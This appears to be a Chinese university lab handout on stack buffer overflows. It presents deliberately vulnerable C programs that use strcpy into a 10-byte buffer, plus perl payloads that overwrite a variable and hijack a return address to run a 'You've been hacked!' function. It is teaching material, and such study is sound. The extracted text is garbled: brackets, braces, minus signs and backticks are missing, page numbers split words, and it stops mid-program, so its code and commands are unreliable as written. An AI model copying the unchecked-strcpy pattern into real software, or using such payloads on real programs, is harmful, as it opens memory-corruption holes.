網(wǎng)絡(luò)安全實(shí)驗(yàn)二

1、實(shí)驗(yàn)二 棧溢出實(shí)驗(yàn)【實(shí)驗(yàn)內(nèi)容】利用棧溢出修改變量值利用棧溢出修改函數(shù)返回地址，運(yùn)行惡意代碼【實(shí)驗(yàn)類型】驗(yàn)證型實(shí)驗(yàn)【實(shí)驗(yàn)學(xué)時(shí)】3學(xué)時(shí)【實(shí)驗(yàn)原理】如果向棧上聲明的緩沖區(qū)中復(fù)制數(shù)據(jù)，但是復(fù)制到數(shù)據(jù)量又比緩沖區(qū)大的時(shí)候，就會(huì)發(fā)生棧溢出。在棧上聲明的各種變量的位置緊臨函數(shù)調(diào)用程序的返回地址。若用戶輸入的數(shù)據(jù)未經(jīng)驗(yàn)證就傳遞給strcpy這樣的函數(shù)，則會(huì)導(dǎo)致變量值被攻擊者指定的值所改寫或調(diào)用函數(shù)的返回地址將被攻擊者選擇的地址所覆蓋，打亂程序正常運(yùn)行流程，轉(zhuǎn)而執(zhí)行惡意代碼。防范棧溢出的有效方法有：禁止棧執(zhí)行，從而阻止攻擊者植入惡意代碼；編寫安全可靠的代碼，始終對(duì)輸入的內(nèi)容進(jìn)行驗(yàn)證；利用編譯器的邊界檢查實(shí)現(xiàn)棧保

2、護(hù)?！緦?shí)驗(yàn)環(huán)境】Linux實(shí)驗(yàn)臺(tái)(CentOS)gcc和gdb工具【實(shí)驗(yàn)步驟】打開Linux實(shí)驗(yàn)臺(tái)，輸入用戶名和口令，進(jìn)入系統(tǒng)。一、 修改變量值(1) 新建stackover1.c文件：touch stackover1.c；(2) 編輯stackover1.c文件：vim stackover1.c，按i鍵進(jìn)如編輯模式，輸入示例程序1，按Esc鍵退出編輯模式，進(jìn)入命令行，輸入:wq保存并退出文件編輯，上述過程如圖3.5.37和圖3.5.38所示； (3) 查看編輯結(jié)果：cat stackover1.c，如圖3.5.39所示； (4) 生成可執(zhí)行文件：gcc stackover1.c o stac

3、kover1；(5) 運(yùn)行執(zhí)行文件：./ stackover1 ABCDE，執(zhí)行結(jié)果如圖3.5.310所示； 從結(jié)果中可以看出，x的值為程序中的設(shè)定值10；(6) 在內(nèi)存中x緊鄰buf，所以輸入11個(gè)字符制造棧緩沖區(qū)溢出，以修改x所在地址空間的值：./ stackover1 ABCDEFGHIJK，運(yùn)行結(jié)果如圖3.5.311所示； x的值為75，對(duì)應(yīng)K的ASCII碼，x的值發(fā)生改變；(7) 利用perl命令輸入適當(dāng)?shù)淖址?，將x的值修改為任意指定的值，如修改為30，十六進(jìn)制為0x1e：./ stackover1 perl e print “A”x10 . “x1e”，運(yùn)行結(jié)果如圖3.5.312

4、所示； x的值為30，修改成功。示例程序1：#include <stdio.h>#include <string.h>void function(char * str) char buf10; int x=10; strcpy(buf,str); printf("x=%dn",x);int main(int argc,char * argv) function(argv1); return 0;二、 修改函數(shù)返回地址，運(yùn)行惡意代碼(1) 參照上述步驟，新建stackover2.c文件，輸入示例程序2，生成可執(zhí)行文件stackover2；(2) 運(yùn)行可

5、執(zhí)行文件并查看結(jié)果：./ stackover2 AAAAA，結(jié)果如圖3.5.313所示； 從結(jié)果中可以看出程序運(yùn)行的棧情況，foo函數(shù)的返回地址位于第7個(gè)位置上，bar的函數(shù)入口地址為0x08048421；(3) 隨意輸入多個(gè)字符制造棧溢出：./ stackover2 perl e print “A”x25，運(yùn)行結(jié)果如圖3.5.315所示； (4) 構(gòu)造輸入字符串，將第7個(gè)位置修改為bar函數(shù)入口地址，即修改foo函數(shù)的返回地址為bar函數(shù)的入口地址，以修改程序運(yùn)行流程：./ stackover2 perl e print “A”x14 . “x21x84x04x08”，運(yùn)行結(jié)果如圖3.5.3

6、17所示； bar函數(shù)運(yùn)行，打印出“Hi!Youve been hacked!”，攻擊成功。通常我們無法獲取函數(shù)的地址和程序運(yùn)行時(shí)棧的情況，需要通過反編譯來查看變量地址或函數(shù)的入口地址，通過深入理解程序運(yùn)行時(shí)的內(nèi)存分配來計(jì)算函數(shù)返回地址在內(nèi)存中的位置，以便達(dá)到修改程序運(yùn)行流程、執(zhí)行惡意代碼的目的示例程序2#include <stdio.h>#include <string.h>void foo(const char *input)char buf10;printf("My stack looks like:n%p n%p n%p n%p n%p n%p n%p

7、 n%p n n");strcpy(buf,input);printf("%sn",buf);printf("Now the stack looks like:n%p n%p n%p n%p n%p n%p n%p n%p n n");void bar(void)printf("Hi!You've been hacked!n"); int main(int argc,char *argv)printf("Address of foo=%p n",foo);printf("Address of bar=%p n",bar);foo(argv1);return 0;【實(shí)驗(yàn)思考】嘗試分析并畫出上述程序的棧結(jié)構(gòu)，可借助gdb命令；嘗試在Windows環(huán)境下進(jìn)行上述實(shí)驗(yàn)，并分析與Linux環(huán)境下的異同；根據(jù)程序運(yùn)行時(shí)的內(nèi)存分配原理計(jì)算函數(shù)的返回地址；以示例程序3為例，通過計(jì)算快速實(shí)現(xiàn)nevercalled函數(shù)的運(yùn)行。示例程序3#include <stdio.h>#include <string.h>void nevercalled() printf("never calledn"); exit(0);void funct